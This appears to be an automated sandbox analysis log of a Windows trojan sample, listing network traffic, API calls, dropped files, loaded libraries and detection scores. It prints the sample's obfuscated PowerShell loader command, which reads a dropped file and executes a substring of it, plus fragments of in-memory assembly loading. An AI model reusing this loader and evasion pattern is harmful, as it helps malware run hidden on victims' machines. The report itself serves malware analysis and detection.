      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.6:50024 version: TLS 1.2
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeJump to dropped file
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004031DD
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004049760_2_00404976
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004064EC0_2_004064EC
      Source: ro7eoySJ9q.exeStatic PE information: invalid certificate
      Source: ro7eoySJ9q.exe, 00000000.00000000.2146223580.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs ro7eoySJ9q.exe
      Source: ro7eoySJ9q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile created: C:\Users\user\AppData\Roaming\PolysulfonateJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile created: C:\Users\user\AppData\Local\Temp\nso61FE.tmpJump to behavior
      Source: ro7eoySJ9q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Source: ro7eoySJ9q.exeVirustotal: Detection: 72%
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile read: C:\Users\user\Desktop\ro7eoySJ9q.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ro7eoySJ9q.exe "C:\Users\user\Desktop\ro7eoySJ9q.exe"
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: ro7eoySJ9q.exeStatic file information: File size 1060792 > 1048576
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbr source: powershell.exe, 00000002.00000002.2825974414.0000000008757000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \System.Core.pdbi$S source: powershell.exe, 00000002.00000002.2825974414.0000000008771000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.2832325462.000000000A25B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.3416961233.0000000004BFB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Udstyrsforretningerne $Reheeling218rnevold20 $Rettergangens), (Dagafsnit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bfsandwichs = [AppDomain]::Current
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Thyboer)), $Pippede).DefineDynamicModule($Slutvrdiernes, $false).DefineType($Ges, $Unpolishedness, [System.MulticastDelegate])$Projekt
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E7A5AF push eax; iretd 2_2_04E7A639
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E7E9F9 push eax; mov dword ptr [esp], edx2_2_04E7EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07810FC4 push es; iretd 2_2_07810FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0781AB44 push 8B6B8DC5h; iretd 2_2_0781AB49
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
